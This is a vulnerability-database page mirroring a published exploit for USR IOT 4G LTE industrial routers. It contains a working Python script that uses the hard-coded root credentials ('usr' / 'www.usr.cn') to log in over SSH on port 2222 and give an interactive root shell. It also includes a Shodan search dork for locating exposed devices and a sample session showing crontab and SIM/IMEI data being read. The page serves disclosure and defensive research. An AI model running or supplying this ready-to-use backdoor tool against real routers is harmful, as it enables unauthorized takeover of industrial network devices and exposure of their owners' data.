Vulners
Lucene search
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
ποΈΒ 21 Apr 2022Β 00:00:00Reported byΒ LiquidWorm, zeroscience.mkTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 398Β Views
`#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
# 1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
# OpenWrt/Linaro GCC 4.8-2014.04
# Ralink SoC MT7628 PCIe RC mode
# BusyBox v1.22.1
# uhttpd
# Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#
import paramiko as bah
import sys as baaaaaah
bnr='''
ββ’ ββ.ββ Β· βββ βͺ βββββ
ββͺβββββ β. ββ βΒ·ββ βͺ β’ββ
βββββββββββββββ ββΒ· ββββ ββ.βͺ
βββββββββͺβββββ’ββββββββ.ββ βββΒ·
ββββΒ· βββΒ·β ββΒ·ββ β’β Β·ββββ βββββͺ βββ βββ
ββ βββͺββ ββ ββ ββͺβββββͺβββͺ ββ βͺ βͺ ββ βΒ·
βββββββββββ ββ ββββββΒ·ββΒ· βββ ββββ ββββ ββββ
ββββͺββββ βͺβββββββββ.ββββ. ββ βββ.βββββ.βββββ’ββ
Β·ββββ β β ββββ Β·β βββββββ’ ββββββͺ βββββͺ.β β
ββ βΒ·βͺ βͺ β’ββ
ββββ ββββ ββββ ββ.βͺ
βββ’βββββ.βββββ.ββ βββΒ·
βββΒ·β ββΒ·ββββΒ· ββββ..βββΒ· .ββ Β·
ββ ββ ββ ββͺββ ββͺββ.βΒ·ββ β. ββ β.
βββββ ββ ββββ ββββββͺβββββββββββββ
ββ βͺβββββββββββββββββββββͺββββββͺββ
β β Β·βββ Β·βββ βββ ββββ ββββ
'''
print(bnr)
if len(baaaaaah.argv)<2:
print('--Gief me an IP.')
exit(0)
adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'
rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
print('--Got rewt!')
except:
print('--Backdoor removed.')
exit(-1)
while True:
cmnd=input('# ')
if cmnd=='exit':
rsh.exec_command('exit')
break
stdin,stdout,stderr = rsh.exec_command(cmnd)
print(stdout.read().decode().strip())
rsh.close()
`
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Apr 2022 00:00Current
0.6Low risk
Vulners AI Score0.6